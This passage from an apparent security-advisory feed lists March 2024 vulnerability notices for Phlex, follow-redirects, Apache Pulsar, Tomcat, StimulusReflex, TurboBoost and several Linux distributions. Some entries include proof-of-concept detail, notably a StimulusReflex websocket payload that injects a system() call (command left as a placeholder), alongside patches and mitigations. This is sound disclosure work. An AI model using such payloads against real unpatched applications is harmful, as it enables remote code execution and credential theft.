since[`aa50c60`](https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1)### WorkaroundsConfiguring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)would effectively prevent this vulnerability from being exploited.### ReferencesIn addition to upgrading to a patched version of Phlex, we stronglyrecommend configuring a Content Security Policy header that does notallow `unsafe-inline`. Here’s how you can configure a Content SecurityPolicy header in Rails.https://guides.rubyonrails.org/security.html#content-security-policy-header	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-28199
14.03.2024 22:14:06	msrc	[MS:CVE-2024-2400] Chromium: CVE-2024-2400 Use after free in Performance Manager		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2400
14.03.2024 19:19:43	npm	[NPM:GHSA-CXJH-PQWP-8MFP] follow-redirects' Proxy-Authorization header kept across hosts (moderate)	When using axios, its dependency library follow-redirects only clears authorization header during cross-domain redirect, but allows the proxy-authentication header which contains credentials too.Steps To Reproduce & PoCaxios Test Codeconst axios = require('axios');axios.get('http://127.0.0.1:10081/',{ headers: { 'AuThorization': 'Rear Test', 'ProXy-AuthoriZation': 'Rear Test', 'coOkie': 't=1' } }).then(function (response) { console.log(response);})When I meet the cross-domain redirect, the sensitive headers like authorization and cookie are cleared, but proxy-authentication header is kept.Request sent by axiosimage-20240314130755052.pngRequest sent by follow-redirects after redirectimage-20240314130809838.pngImpactThis vulnerability may lead to credentials leak.RecommendationsRemove proxy-authentication header during cross-domain redirectRecommended Patchfollow-redirects/index.js:464removeMatchingHeaders(/^(?:authorization\|cookie)$/i, this._options.headers);change toremoveMatchingHeaders(/^(?:authorization\|proxy-authorization\|cookie)$/i, this._options.headers);Refhttps://fetch.spec.whatwg.org/#authentication-entrieshttps://hackerone.com/reports/2390009	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CXJH-PQWP-8MFP
14.03.2024 19:15:51	alpinelinux	[ALPINE:CVE-2023-38575] intel-ucode vulnerability (medium)	[From CVE-2023-38575] Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38575
14.03.2024 19:15:51	alpinelinux	[ALPINE:CVE-2023-39368] intel-ucode vulnerability (medium)	[From CVE-2023-39368] Protection mechanism failure of bus lock regulator for some Intel(R) Processors may allow an unauthenticated user to potentially enable denial of service via network access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39368
14.03.2024 19:15:51	alpinelinux	[ALPINE:CVE-2023-43490] intel-ucode vulnerability (medium)	[From CVE-2023-43490] Incorrect calculation in microcode keying mechanism for some Intel(R) Xeon(R) D Processors with Intel(R) SGX may allow a privileged user to potentially enable information disclosure via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-43490
14.03.2024 19:15:50	alpinelinux	[ALPINE:CVE-2023-28746] intel-ucode vulnerability (medium)	[From CVE-2023-28746] Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-28746
14.03.2024 19:15:49	alpinelinux	[ALPINE:CVE-2023-22655] intel-ucode vulnerability (medium)	[From CVE-2023-22655] Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-22655
14.03.2024 13:45:28	ubuntu	[USN-6695-1] TeX Live vulnerabilities (critical)	Several security issues were fixed in TeX Live.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6695-1
14.03.2024 12:19:40	ubuntu	[USN-6694-1] Expat vulnerabilities (high)	Expat could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6694-1
14.03.2024 10:59:53	ubuntu	[USN-6673-2] python-cryptography vulnerability (high)	python-cryptography could be made to expose sensitive information over thenetwork.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-2
14.03.2024 09:00:00	msrc	[MS:CVE-2024-26163] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26163
14.03.2024 09:00:00	msrc	[MS:CVE-2024-26246] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26246
14.03.2024 02:00:00	debian	[DSA-5640-1] openvswitch (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5640-1
14.03.2024 02:00:00	redhat	[RHSA-2024:1335] dnsmasq security update (important)	The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1335
14.03.2024 02:00:00	redhat	[RHSA-2024:1334] dnsmasq security update (important)	The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSECvalidator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof canexhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1334
14.03.2024 02:00:00	redhat	[RHSA-2024:1332] kernel-rt security update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)* use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)* use-after-free in sch_qfq network scheduler (CVE-2023-4921)* IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)* nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1332
14.03.2024 16:04:07	maven	[MAVEN:GHSA-V682-8VV8-VPWR] Denial of Service via incomplete cleanup vulnerability in Apache Tomcat (moderate)	Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V682-8VV8-VPWR
14.03.2024 11:41:29	almalinux	[ALSA-2024:1311] .NET 8.0 security update (moderate)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1311
14.03.2024 11:56:35	almalinux	[ALSA-2024:1308] .NET 7.0 security update (moderate)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1308
14.03.2024 12:35:33	almalinux	[ALSA-2024:1309] .NET 7.0 security update (moderate)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1309
14.03.2024 14:45:29	almalinux	[ALSA-2024:1310] .NET 8.0 security update (moderate)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1310
14.03.2024 23:40:28	maven	[MAVEN:GHSA-C2X9-VW5H-39VC] Apache Pulsar: Pulsar Functions Worker Allows Unauthorized File Access and Unauthorized HTTP/HTTPS Proxying (high)	The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks.This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true".This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6.2.11 Pulsar Function Worker users should upgrade to at least 2.11.4.3.0 Pulsar Function Worker users should upgrade to at least 3.0.3.3.1 Pulsar Function Worker users should upgrade to at least 3.1.3.3.2 Pulsar Function Worker users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". These keys allow users to specify a set of URL patterns that are permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C2X9-VW5H-39VC
14.03.2024 23:39:32	maven	[MAVEN:GHSA-JG2G-4RJG-CMQH] Apache Pulsar: Pulsar Functions Worker's Archive Extraction Vulnerability Allows Unauthorized File Modification (high)	In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true".This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6.2.11 Pulsar Function Worker users should upgrade to at least 2.11.4.3.0 Pulsar Function Worker users should upgrade to at least 3.0.3.3.1 Pulsar Function Worker users should upgrade to at least 3.1.3.3.2 Pulsar Function Worker users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JG2G-4RJG-CMQH
14.03.2024 09:00:00	msrc	[MS:CVE-2024-26201] Microsoft Intune Linux Agent Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26201
14.03.2024 09:00:00	msrc	[MS:CVE-2024-26167] Microsoft Edge for Android Spoofing Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26167
15.03.2024 21:53:58	npm	[NPM:GHSA-MP76-7W5V-PR75] TurboBoost Commands vulnerable to arbitrary method invocation (high)	### ImpactTurboBoost Commands has existing protections in place to guarantee that only public methods on Command classes can be invoked; however, the existing checks aren't as robust as they should be. It's possible for a sophisticated attacker to invoke more methods than should be permitted depending on the the strictness of authorization checks that individual applications enforce. Being able to call some of these methods can have security implications.#### DetailsCommands verify that the class must be a `Command` and that the method requested is defined as a public method; however, this isn't robust enough to guard against all unwanted code execution. The library should more strictly enforce which methods are considered safe before allowing them to be executed. ### PatchesPatched in the following versions.- 0.1.3 - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3) - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)- 0.2.2 - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2) - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)### WorkaroundsYou can add this guard to mitigate the issue if running an unpatched version of the library.```rubyclass ApplicationCommand < TurboBoost::Commands::Command before_command do method_name = params[:name].include?("#") ? params[:name].split("#").last : :perform ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1] allowed = ancestors.any? { \|a\| a.public_instance_methods(false).any? method_name.to_sym } throw :abort unless allowed # ← blocks invocation # raise "Invalid Command" unless allowed # ← blocks invocation endend```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MP76-7W5V-PR75
15.03.2024 21:43:52	maven	[MAVEN:GHSA-QMGX-J96G-4428] SSRF vulnerability using the Aegis DataBinding in Apache CXF (moderate)	A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. Users of other data bindings (including the default databinding) are not impacted.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QMGX-J96G-4428
15.03.2024 21:35:37	maven	[MAVEN:GHSA-R978-9M6M-6GM6] Apache ZooKeeper vulnerable to information disclosure in persistent watchers handling (moderate)	Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical.Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R978-9M6M-6GM6
15.03.2024 02:00:00	oraclelinux	[ELSA-2024-1308] .NET 7.0 security update (moderate)	[7.0.117-1.0.1]- Update to .NET SDK 7.0.117 and Runtime 7.0.17- Port Revert 'Disable implicit rejection for RSA PKCS#1 (#95217) patch	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1308
15.03.2024 02:00:00	oraclelinux	[ELSA-2024-1334] dnsmasq security update (important)	[2.85-14.1]- Fix CVE 2023-50387 and CVE 2023-50868- Resolves: RHEL-25674- Resolves: RHEL-25638	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1334
15.03.2024 02:00:00	oraclelinux	[ELSA-2024-1335] dnsmasq security update (important)	[2.79-31.2]- Fix CVE 2023-50387 and CVE 2023-50868- Resolves: RHEL-25628- Resolves: RHEL-25666[2.79-31.1]- Do not crash on invalid domain in --synth-domain option (RHEL-22741)[2.79-31]- Do not create and search --local and --address=/x/# domains (#2233542)[2.79-30]- Make create logfile writeable by root (#2156789)[2.79-29]- Fix also dynamically set resolvers over dbus (#2186481)[2.79-28]- Correct possible crashes when server=/example.net/# is used (#2186481)[2.79-27]- Limit offered EDNS0 size to 1232 (CVE-2023-28450)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1335
15.03.2024 09:00:00	msrc	[MS:CVE-2024-26163] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26163
15.03.2024 09:00:00	msrc	[MS:CVE-2024-26246] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26246
15.03.2024 18:27:58	maven	[MAVEN:GHSA-7W75-32CG-R6G2] Apache Tomcat Denial of Service due to improper input validation vulnerability for HTTP/2 requests (moderate)	Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7W75-32CG-R6G2
17.03.2024 01:21:23	rubysec	[RUBYSEC:TURBO_BOOST-COMMANDS-2024-28181] TurboBoost Commands vulnerable to arbitrary method invocation (high)	### ImpactTurboBoost Commands has existing protections in place toguarantee that only public methods on Command classes can be invoked; however, theexisting checks aren't as robust as they should be. It's possible for a sophisticatedattacker to invoke more methods than should be permitted depending on the the strictnessof authorization checks that individual applications enforce. Being able to callsome of these methods can have security implications.#### DetailsCommands verify that the class must be a `Command` and that the method requested isdefined as a public method; however, this isn't robust enough to guard against allunwanted code execution. The library should more strictly enforce which methods areconsidered safe before allowing them to be executed.### PatchesPatched in the following versions.- 0.1.3 - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3) - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)- 0.2.2 - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2) - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)### WorkaroundsYou can add this guard to mitigate the issue if running an unpatchedversion of the library.```rubyclass ApplicationCommand < TurboBoost::Commands::Command before_command do method_name = params[:name].include?(\"#\") ? params[:name].split(\"#\").last : :perform ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1] allowed = ancestors.any? { \|a\| a.public_instance_methods(false).any? method_name.to_sym } throw :abort unless allowed # ← blocks invocation # raise \"Invalid Command\" unless allowed # ← blocks invocation endend```	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:TURBO_BOOST-COMMANDS-2024-28181
18.03.2024 18:48:35	ubuntu	[USN-6698-1] Vim vulnerability (high)	Vim could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6698-1
18.03.2024 22:10:29	maven	[MAVEN:GHSA-F3JH-QVM4-MG39] Erroneous authentication pass in Spring Security (high)	In Spring Security, versions 5.7.x prior to 5.7.12, 5.8.x prior to 5.8.11, versions 6.0.x prior to 6.0.9, versions 6.1.x prior to 6.1.8, versions 6.2.x prior to 6.2.3, an application is possible vulnerable to broken access control when it directly uses the AuthenticatedVoter#vote passing a null Authentication parameter.Specifically, an application is vulnerable if:The application uses AuthenticatedVoter directly and a null authentication parameter is passed to it resulting in an erroneous true return value.An application is not vulnerable if any of the following is true:* The application does not use AuthenticatedVoter#vote directly.* The application does not pass null to AuthenticatedVoter#vote.Note that AuthenticatedVoter is deprecated since 5.8, use implementations of AuthorizationManager as a replacement.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F3JH-QVM4-MG39
18.03.2024 15:00:33	ubuntu	[USN-6697-1] Bash vulnerability (high)	Bash could be made to crash or run programs as your login if it opened aspecially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6697-1
18.03.2024 06:06:20	ubuntu	[USN-6696-1] OpenJDK 8 vulnerabilities (high)	Several security issues were fixed in OpenJDK 8.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6696-1
18.03.2024 18:20:32	maven	[MAVEN:GHSA-HGJH-9RJ2-G67J] Spring Framework URL Parsing with Host Validation Vulnerability (high)	Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243, but with different input.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HGJH-9RJ2-G67J
18.03.2024 10:24:00	almalinux	[ALSA-2024:1335] dnsmasq security update (important)	dnsmasq security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1335
18.03.2024 10:20:39	almalinux	[ALSA-2024:1334] dnsmasq security update (important)	dnsmasq security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1334
17.03.2024 02:00:00	freebsd	[FREEBSD:0A48E552-E470-11EE-99B3-589CFC0F81B0] amavisd-new -- multipart boundary confusion	The Amavis project reports: Emails which consist of multiple parts (`Content-Type: multipart/*`) incorporate boundary information stating at which point one part ends and the next part begins. A boundary is announced by an Content-Type header's `boundary` parameter. To our current knowledge, RFC2046 and RFC2045 do not explicitly specify how a parser should handle multiple boundary parameters that contain conflicting values. As a result, there is no canonical choice which of the values should or should not be used for mime part decomposition.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:0A48E552-E470-11EE-99B3-589CFC0F81B0
18.03.2024 05:40:47	rubysec	[RUBYSEC:STIMULUS_REFLEX-2024-28121] StimulusReflex arbitrary method call (high)	### SummaryMore methods than expected can be called on reflex instances.Being able to call some of them has security implications.### DetailsTo invoke a reflex a websocket message of the following shape is sent:```json{ "target": "[class_name]#[method_name]", "args": []}```The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments [ref]:[ref]: https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83```rubymethod = reflex.method method_namerequired_params = method.parameters.select { \|(kind, _)\| kind == :req }optional_params = method.parameters.select { \|(kind, _)\| kind == :opt }if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size reflex.public_send(method_name, *arguments)end```This is problematic as `reflex.method(method_name)` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the `instance_variable_set` method.```json{ "target": "StimulusReflex::Reflex#render_collection", "args": [ { "inline": "<% system('[command here]') %>" } ]}```### PatchesPatches are available on [RubyGems] and on [NPM].[RubyGems]: https://rubygems.org/gems/stimulus_reflex[NPM]: https://npmjs.org/package/stimulus_reflexThe patched versions are:- [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)- [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)### WorkaroundYou can add this guard to mitigate the issue if running an unpatchedversion of the library.1.) Make sure all your reflexes inherit from the `ApplicationReflex` class2.) Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:```rubyclass ApplicationReflex < StimulusReflex::Reflex before_reflex do ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1] allowed = ancestors.any? { \|a\| a.public_instance_methods(false).any?(method_name.to_sym) } raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed endend```	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STIMULUS_REFLEX-2024-28121
20.03.2024 02:28:21	slackware	[SSA:2024-079-03] mozilla-thunderbird (high)	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.9.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-14/ https://www.cve.org/CVERecord?id=CVE-2024-0743 https://www.cve.org/CVERecord?id=CVE-2024-2605 https://www.cve.org/CVERecord?id=CVE-2024-2607 https://www.cve.org/CVERecord?id=CVE-2024-2608 https://www.cve.org/CVERecord?id=CVE-2024-2616 https://www.cve.org/CVERecord?id=CVE-2023-5388 https://www.cve.org/CVERecord?id=CVE-2024-2610 https://www.cve.org/CVERecord?id=CVE-2024-2611 https://www.cve.org/CVERecord?id=CVE-2024-2612 https://www.cve.org/CVERecord?id=CVE-2024-2614 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.9.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.9.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.9.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.9.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:4618baa1a57c4aa4835d5019eb72c294 mozilla-thunderbird-115.9.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:218c827f2371df972f486758a0cfccdd mozilla-thunderbird-115.9.0-x86_64-1_slack15.0.txzSlackware -current package:6e57078f76e49bc84eb18dfdcf1dfb66 xap/mozilla-thunderbird-115.9.0-i686-1.txzSlackware x86_64 -current package:8d77d2b826be2370cfe23f15a237361e xap/mozilla-thunderbird-115.9.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.9.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-03
20.03.2024 02:27:50	slackware	[SSA:2024-079-02] mozilla-firefox (high)	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.9.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-13/ https://www.cve.org/CVERecord?id=CVE-2024-0743 https://www.cve.org/CVERecord?id=CVE-2024-2605 https://www.cve.org/CVERecord?id=CVE-2024-2607 https://www.cve.org/CVERecord?id=CVE-2024-2608 https://www.cve.org/CVERecord?id=CVE-2024-2616 https://www.cve.org/CVERecord?id=CVE-2023-5388 https://www.cve.org/CVERecord?id=CVE-2024-2610 https://www.cve.org/CVERecord?id=CVE-2024-2611 https://www.cve.org/CVERecord?id=CVE-2024-2612 https://www.cve.org/CVERecord?id=CVE-2024-2614 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.9.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.9.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.9.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.9.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:70d69e0628d6abe611ea0eea4c2bafca mozilla-firefox-115.9.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:d3fecb96e60e43763f35cfc16d2a579e mozilla-firefox-115.9.0esr-x86_64-1_slack15.0.txzSlackware -current package:26b970951bb68bf2239275dac7ab6d5d xap/mozilla-firefox-115.9.0esr-i686-1.txzSlackware x86_64 -current package:52446847102fe96dcf898923285e9c9a xap/mozilla-firefox-115.9.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.9.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-02
20.03.2024 02:27:18	slackware	[SSA:2024-079-01] gnutls	New gnutls packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/gnutls-3.8.4-i586-1_slack15.0.txz: Upgraded. This update fixes two medium severity security issues: libgnutls: Fix side-channel in the deterministic ECDSA. Reported by George Pantelakis (#1516). libgnutls: Fixed a bug where certtool crashed when verifying a certificate chain with more than 16 certificates. Reported by William Woodruff (#1525) and yixiangzhike (#1527). For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-28834 https://www.cve.org/CVERecord?id=CVE-2024-28835 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gnutls-3.8.4-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gnutls-3.8.4-x86_64-1_slack15.0.txzUpdated package for 